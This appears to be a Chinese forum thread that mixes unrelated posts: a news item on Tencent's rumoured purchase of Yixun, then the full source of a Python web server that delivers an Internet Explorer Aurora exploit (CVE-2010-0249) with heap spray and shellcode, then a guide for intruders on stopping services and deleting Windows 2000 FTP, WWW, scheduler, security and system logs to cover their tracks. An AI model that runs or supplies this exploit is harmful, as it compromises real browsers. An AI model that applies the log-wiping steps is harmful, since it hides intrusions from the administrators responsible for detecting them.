返回列表 发帖

传腾讯将收购易迅网 或与拍拍网联合

收购易迅网 “只是时间问题”
    泡泡网资讯频道10月17日 关于腾讯收购B2C购物网站易迅网的消息又重新兴起。虽然其真实性尚未证实,但当事者的暧昧态度似已预示了事情的发展趋势。有分析称,腾讯此举意在加大B2C领域发展力度,易迅网收至麾下之后,将与腾讯旗下C2C平台拍拍网联合,双剑合璧进军电子商务

易迅网国内排名第三的3C产品购物网站(网页截图)

    收购易迅网 “只是时间问题”

    早在9月份,一位电子商务业内人士就爆料说,腾讯已经全资收购易迅网。随后包括经纬创投合伙人张颖、易观资本的张鹏程在内的多位业界人士均从侧面证实易迅网有意出售。当事人也态度暧昧,易迅网的CEO卜广齐称目前与腾讯只是在QQ商城和QQ返利上有业务合作,并未涉及资本层面,未来易迅网的去向他也“不好说”。
    加上之前马化腾曾在公开场合称要和国内B2C网站加强合作,如此看来,似乎腾讯收购易迅网已成定局。有知情人士透露,收购只是时间问题,腾讯进军B2C行业的步伐基本已经迈开。
    易迅网是继京东商城、新蛋网之后的排名第三的国内3C产品购物网站,据称今年一季度易迅网盈利0.7亿人民币,二季度盈利0.8亿人民币,市场份额保持在0.07%。易迅网今年的销售额将达8个亿。
    易观国际分析师陈寿送表示,之前腾讯的电子商务平台包括拍拍网和今年刚转型B2C的QQ商城,而真正的B2C商城仍没有,不管此次收购是否属实,腾讯未来肯定会去做这个事情实际上,目前淘宝和拍拍这样的C2C的集市模式未来将会是一个弱化的趋势,而B2C不管是商城的模式还是平台,都会有一个比较好的发展机会。腾讯一直以提供给用户一站式服务,肯定也会考虑到用户的需求。
或与拍拍网联合 B2C、C2C双剑合璧
    有分析称,腾讯旗下的两个B2C类型网站拍拍网、QQ商城和是其目前手中握有的筹码,一旦成功收购易迅网,腾讯下一步将会首先整合手中的B2C阵型,为全面进军B2C市场做准备。而被收编的易迅网将会与拍拍网产生业务联合,形成B2C与C2C平台互为支撑型的发展模式。

被腾讯收编之后,易迅网将于拍拍双剑合璧(网页截图)

    拍拍网作为电子商务交易平台,2005年9月份上线发布,06年3月份宣布正式运营。仅仅一年时间,拍拍网就成为与易趣、淘宝并肩的中国最有影响力的三大C2C平台之一。依托QQ庞大的用户群体,2009年底,拍拍网的注册用户已超过5000万,在线商品数量超过1500万。2009年底,中国互联网调查报告显示C2C电子商务市场淘宝网占80%,拍拍网占10%,易趣占5%,有啊占0.43%,其他占4.57%。
    中国电子商务在刚起步的阶段C2C占到了80%以上的份额,但现在已经有慢慢下滑的趋势,淘宝也是向着网上商城、“大型百货”的方向转变。
    反观腾讯的B2C筹码——QQ商城,其前身是QQ会员官方店,于今年3月升级为专业B2C平台。主营服装、家电、母婴用品等。但其发展一直屈居京东商城、新蛋网之下,找不到突破口。深圳前景在线客户总监、电子商务分析师王青海认为:“独立的B2C也许只是腾讯在电子商务领域中一个部分,他们目前也在整合商城的用户,B2C可以对腾讯后劲略显不足的C2C业务起到有益的补充。总的来看,B2C之于腾讯像是一次突破尝试。”
    而腾讯要想做B2C甚至是整个电子商务链条的老大,收购一个现成的商城是快速进入B2C的电梯,很明显是较明智的选择。
附件: 您需要登录才可以下载或查看附件。没有帐号?进入圈子

 

您可能还想看的主题:

网传腾讯收购易迅网 或在B2C掀起波澜

马化腾首次表态:手机安全不能交给一家公司

谁知道 下面是如何计算出来的? 有报酬 高手来

腾讯、百度、金山共建最大反欺诈网址库

腾讯发布盲人专用手机QQ

大学生QQ相约自杀 腾讯被判承担10%责任并赔偿

Groupon创始人对谷歌收购传闻拒绝表态

360与腾讯响应工信部要求 分别公开道歉

腾讯360掐架惹怒网民 有网络公司发布QQ劝架补丁

英特尔与腾讯建立联合创新实验室

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小一发表,本帖发表者小一符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小一和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

Internet Explorer Aurora Exploit(0DAY)
2010/01/18 16:48
<TABLE style="TABLE-LAYOUT: fixed; WIDTH: 100%">



##   Author : Ahmed Obied (ahmed.obied@gmail.com)##   This program acts as a web server that generates an exploit to #   target a vulnerability (CVE-2010-0249) in Internet Explorer. #   The exploit was tested using Internet Explorer 6 on Windows XP SP2. #   The exploit's payload spawns the calculator. ##   Usage : python ie_aurora.py [port number]#   import sysimport socketfrom BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler        class RequestHandler(BaseHTTPRequestHandler):    def convert_to_utf16(self, payload):        enc_payload = ''        for i in range(0, len(payload), 2):            num = 0            for j in range(0, 2):                num += (ord(payload[i + j]) &amp; 0xff) << (j * 8)            enc_payload += '%%u%04x' % num        return enc_payload                    def get_payload(self):        # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub        # http://metasploit.com        payload = 'x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73'        payload += 'x13x6fx02xb1x0ex83xebxfcxe2xf4x93xeaxf5x0e'        payload += 'x6fx02x3ax4bx53x89xcdx0bx17x03x5ex85x20x1a'        payload += 'x3ax51x4fx03x5ax47xe4x36x3ax0fx81x33x71x97'        payload += 'xc3x86x71x7ax68xc3x7bx03x6exc0x5axfax54x56'        payload += 'x95x0ax1axe7x3ax51x4bx03x5ax68xe4x0exfax85'        payload += 'x30x1exb0xe5xe4x1ex3ax0fx84x8bxedx2ax6bxc1'        payload += 'x80xcex0bx89xf1x3exeaxc2xc9x02xe4x42xbdx85'        payload += 'x1fx1ex1cx85x07x0ax5ax07xe4x82x01x0ex6fx02'        payload += 'x3ax66x53x5dx80xf8x0fx54x38xf6xecxc2xcax5e'        payload += 'x07x7cx69xecx1cx6ax29xf0xe5x0cxe6xf1x88x61'        payload += 'xd0x62x0cx2cxd4x76x0ax02xb1x0e'        return self.convert_to_utf16(payload)        def get_exploit(self):        exploit = '''        <html>        <head>            <script>                        var obj, event_obj;                        function spray_heap()            {                var chunk_size, payload, nopsled;                            chunk_size = 0x80000;                payload = unescape("<PAYLOAD>");                nopsled = unescape("<NOP>");                while (nopsled.length < chunk_size)                    nopsled += nopsled;                nopsled_len = chunk_size - (payload.length + 20);                        nopsled = nopsled.substring(0, nopsled_len);                heap_chunks = new Array();                for (var i = 0 ; i < 200 ; i++)                    heap_chunks = nopsled + payload;            }                    function initialize()            {                obj = new Array();                event_obj = null;                for (var i = 0; i < 200 ; i++ )                    obj = document.createElement("COMMENT");            }                    function ev1(evt)            {                event_obj = document.createEventObject(evt);                document.getElementById("sp1").innerHTML = "";                window.setInterval(ev2, 1);            }                  function ev2()            {                var data, tmp;                                data = "";                tmp = unescape("%u0a0a%u0a0a");                for (var i = 0 ; i < 4 ; i++)                    data += tmp;                for (i = 0 ; i < obj.length ; i++ ) {                    obj.data = data;                }                event_obj.srcElement;            }                                function check()            {                if (navigator.userAgent.indexOf("MSIE") == -1)                    return false;                return true;               }                        if (check()) {                initialize();                spray_heap();                           }            else                window.location = 'about:blank'                            </script>        </head>        <body>            <span id="sp1">            <img src="aurora.gif" onload="ev1(event)">            </span>                </body>        </html>        '''        exploit = exploit.replace('<PAYLOAD>', self.get_payload())        exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')        return exploit     def get_image(self):        content = 'x47x49x46x38x39x61x01x00x01x00x80x00x00xffxffxff'        content += 'x00x00x00x2cx00x00x00x00x01x00x01x00x00x02x02x44'        content += 'x01x00x3b'        return content    def log_request(self, *args, **kwargs):        pass            def do_GET(self):        try:            if self.path == '/':                print                print '[-] Incoming connection from %s' % self.client_address[0]                self.send_response(200)                 self.send_header('Content-Type', 'text/html')                self.end_headers()                print '[-] Sending exploit to %s ...' % self.client_address[0]                self.wfile.write(self.get_exploit())                print '[-] Exploit sent to %s' % self.client_address[0]            elif self.path == '/aurora.gif':                      self.send_response(200)                self.send_header('Content-Type', 'image/gif')                self.end_headers()                self.wfile.write(self.get_image())        except:             print '
  • Error : an error has occured while serving the HTTP request'            print '[-] Exiting ...'            sys.exit(-1)                                   def main():    if len(sys.argv) != 2:        print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]        sys.exit(0)    try:        port = int(sys.argv[1])        if port < 1024 or port > 65535:            raise ValueError        try:            serv = HTTPServer(('', port), RequestHandler)            ip = socket.gethostbyname(socket.gethostname())            print '[-] Web server is running at http://%s:%d/' % (ip, port)            try:                serv.serve_forever()            except:                print '[-] Exiting ...'         except socket.error:            print '
  • Error : a socket error has occurred'        sys.exit(-1)        except ValueError:        print '
  • Error : an invalid port number was given'        sys.exit(-1)            if __name__ == '__main__':    main()</TABLE>


















    公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    清除服务器日志代码总结
    一:开始 - 程序 - 管理工具 - 计算机管理 - 系统工具 -事件查看器,然后清除日志。 二: Windows2000的日志文件通常有应用程序日志,安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等。 日志文件默认位置: 应用程序日志、安全日志、系统日志、DNS日志默认位置:%sys temroot%system32config,默认文件大小512KB,管理员都会改变这个默认大小。 安全日志文件:%systemroot%system32configSecEvent.EVT; 系统日志文件:%systemroot%system32configSysEvent.EVT; 应用程序日志文件:%systemroot%system32configAppEvent.EVT; Internet信息服务FTP日志默认位置:%systemroot%system32logfilesmsftpsvc1,默认每天一个日志; Internet信息服务WWW日志默认位置:%systemroot%system32logfilesw3svc1,默认每天一个日志; Scheduler服务日志默认位置:%sys temroot%schedlgu.txt; 以上日志在注册表里的键: 应用程序日志,安全日志,系统日志,DNS服务器日志,它们这些LOG文件在注册表中的: HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog 有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表,里面可查到以上日志的定位目录。 Schedluler服务日志在注册表中 HKEY_LOCAL_MACHINESOFTWAREMicrosoftSchedulingAgent FTP和WWW日志详解: FTP日志和WWW日志默认情况,每天生成一个日志文件,包含了该日的一切记录,文件名通常为ex(年份)(月份)(日期),例如ex001023,就是2000年10月23日产生的日志,用记事本就可直接打开,如下例: #Software: Microsoft Internet Information Services 5.0  (微软IIS5.0) #Version: 1.0 (版本1.0) #Date: 20001023 0315 (服务启动时间日期) #Fields: time cip csmethod csuristem scstatus 0315 127.0.0.1 [1]USER administator 331 (IP地址为127.0.0.1用户名为administator试图登录) 0318 127.0.0.1 [1]PASS – 530 (登录失败) 032:04 127.0.0.1 [1]USER nt 331 (IP地址为127.0.0.1用户名为nt的用户试图登录) 032:06 127.0.0.1 [1]PASS – 530 (登录失败) 032:09 127.0.0.1 [1]USER cyz 331 (IP地址为127.0.0.1用户名为cyz的用户试图登录) 0322 127.0.0.1 [1]PASS – 530 (登录失败) 0322 127.0.0.1 [1]USER administrator 331 (IP地址为127.0.0.1用户名为administrator试图登录) 0324 127.0.0.1 [1]PASS – 230 (登录成功) 0321 127.0.0.1 [1]MKD nt 550 (新建目录失败) 0325 127.0.0.1 [1]QUIT – 550 (退出FTP程序) 从日志里就能看出IP地址为127.0.0.1的用户一直试图登录系统,换了四次用户名和密码才成功,管理员立即就可以得知管理员的入侵时间、IP地址以及探测的用户名,如上例入侵者最终是用administrator用户名进入的,那么就要考虑更换此用户名的密码,或者重命名administrator用户。 WWW日志: WWW服务同FTP服务一样,产生的日志也是在%sys temroot%sys tem32LogFilesW3SVC1目录下,默认是每天一个日志文件,下面是一个典型的WWW日志文件 #Software: Microsoft Internet Information Services 5.0 #Version: 1.0 #Date: 20001023 03:091 #Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent) 20001023 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt) 20001023 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt) 通过分析第六行,可以看出2000年10月23日,IP地址为192.168.1.26的用户通过访问IP地址为192.168.1.37机器的80端口,查看了一个页面iisstart.asp,这位用户的浏览器为compatible;+MSIE+5.0;+Windows+98+DigExt,有经验的管理员就可通过安全日志、FTP日志和WWW日志来确定入侵者的IP地址以及入侵时间。 既使你删掉FTP和WWW日志,但是还是会在系统日志和安全日志里记录下来,但是较好的是只显示了你的机器名,并没有你的IP。 属性里记录了出现警告的原因,是因为有人试图用administator用户名登录,出现一个错误,来源是FTP服务。 这里有两种图标:钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标,表示四次失败审核,事件类型是帐户登录和登录、注销失败,日期为2000年10月18日,时间为1002,这就需要重点观察。 双点第一个失败审核事件的,即得到此事件的详细描述。 经过分析我们可以得知有个CYZ的工作站,用administator用户名登录本机,但是因为用户名未知或密码错误(实际为密码错误)未能成功。另外还有DNS服务器日志,不太重要,就此略过(其实是我没有看过它)。 知道了Windows2000日志的详细情况,下面就要学会怎样删除这些日志: 通过上面,得知日志文件通常有某项服务在后台保护,除了系统日志、安全日志、应用程序日志等等,它们的服务是Windos2000的关键进程,而且与注册表文件在一块,当Windows2000启动后,启动服务来保护这些文件,所以很难删除,而FTP日志和WWW日志以及Scedlgu日志都是可以轻易地删除的。首先要取得Admnistrator密码或Administrators组成员之一,然后Telnet到远程主机,先来试着删除FTP日志: D:SERVER>del schedlgu.txt D:SERVERSchedLgU.Txt 进程无法访问文件,因为另一个程序正在使用此文件。说过了,后台有服务保护,先把服务停掉! D:SERVER>net stop "task scheduler" 下面的服务依赖于 Task Scheduler 服务。停止 Task Scheduler 服务也会停止这些服务。 Remote Storage Engine 是否继续此操作? (Y/N) [N]: y Remote Storage Engine 服务正在停止.... Remote Storage Engine 服务已成功停止。 Task Scheduler 服务正在停止. Task Scheduler 服务已成功停止。 OK,它的服务停掉了,同时也停掉了与它有依赖关系的服务。再来试着删一下! D:SERVER>del schedlgu.txt D:SERVER> 没有反应?成功了!下一个是FTP日志和WWW日志,原理都是一样,先停掉相关服务,然后再删日志! D:SERVERsystem32LogFilesMSFTPSVC1>del ex*.log D:SERVERsystem32LogFilesMSFTPSVC1> 以上操作成功删除FTP日志!再来WWW日志! D:SERVERsystem32LogFilesW3SVC1>del ex*.log D:SERVERsystem32LogFilesW3SVC1> OK!恭喜,现在简单的日志都已成功删除。下面就是很难的安全日志和系统日志了,守护这些日志的服务是Event Log,试着停掉它! D:SERVERsystem32LogFilesW3SVC1>net stop eventlog 这项服务无法接受请求的 "暂停" 或 "停止" 操作。没办法,它是关键服务。如果不用第三方工具,在命令行上根本没有删除安全日志和系统日志的可能!所以还是得用虽然简单但是速度慢得死机的办法:打开“控制面板”的“管理工具”中的“事件查看器”(98没有,知道用Win2k的好处了吧),在菜单的“操作”项有一个名为“连接到另一台计算机”的菜单,点击它,输入远程计算机的IP,然后等上数十分钟,接着选择远程计算机的安全性日志,右键选择它的属性:点击属性里的“清除日志”按钮,OK!安全日志清除完毕!同样的忍受痛苦去清除系统日志! 目前在不借助第三工具的情况下,能很快,很顺利地清除FTP、 WWW还有Schedlgu日志,就是系统日志和安全日志属于Windows2000的严密守护,只能用本地的事件查看器来打开它,因为在图形界面下,加之网速又慢,如果你银子多,时间闲,还是可以清除它的。综上所述,介绍了Windows2000的日志文件以及删除方法,但是你必须是 Administrator,注意必须作为管理员或管理组的成员登录才能打开安全日志记录。该过程适用于  Windows 2000 Professional 计算机,也适用于作为独立服务器或成员服务器运行的 Windows 2000 Server  计算机。


















    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表